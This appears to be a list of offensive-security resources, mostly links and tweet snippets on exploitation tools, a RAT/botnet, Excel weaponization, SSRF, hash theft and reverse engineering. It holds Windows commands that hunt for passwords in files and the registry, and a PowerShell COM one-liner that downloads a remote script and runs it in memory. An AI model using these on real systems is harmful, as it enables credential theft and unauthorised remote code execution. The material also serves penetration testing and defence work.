File upload vulnerability scanner and exploitation tool.
https://t.co/JoQu6EQz6Y

Credentials & lateral movement

findstr /si password *.txt
findstr /si password *.xml
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki

Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html

Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767

MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5

Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net

Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3

Apktool v2.4.0 Released
https://connortumbleson.com/2019/03/03/apktool-v2-4-0-released/

Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.

Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane

Powershell + COM fileless download exec alternative:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;

You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.

And set the proxy using setProxy() method.

Creating a Simple Free Malware Analysis Environment - MalwareTech
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html

Add Drupal SA-CORE-2019-003 (CVE-2019-6340) · Issue #11481 · rapid7/metasploit-framework · GitHub
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674

An Hour with Ghidra : The Good and The Ugly
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/

Server Side Request Forgery SSRF Types And Ways To Exploit It:-

Part 1:-
https://t.co/Iv2NkSLDYB

Part 2:-
https://t.co/p7rVZYCZkL

Released a short introductory/quickstart tutorial for Ghidra: Solving a simple crackme. https://t.co/1cRlJi1i21

NMAP Tips: RTFM?
https://blog.zsec.uk/nmap-rtfm/

Extracting Android KeyStores from apps – ceres-c
http://ceres-c.it/frida-android-keystore/

How to steal NTLMv2 hashes using file download vulnerability in web application | Start With Linux | Mannu Linux
http://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html?m=1

awesome-windows-kernel-security-development/README.md at master · ExpLife0011/awesome-windows-kernel-security-development · GitHub
https://github.com/ExpLife0011/awesome-windows-kernel-security-development/blob/master/README.md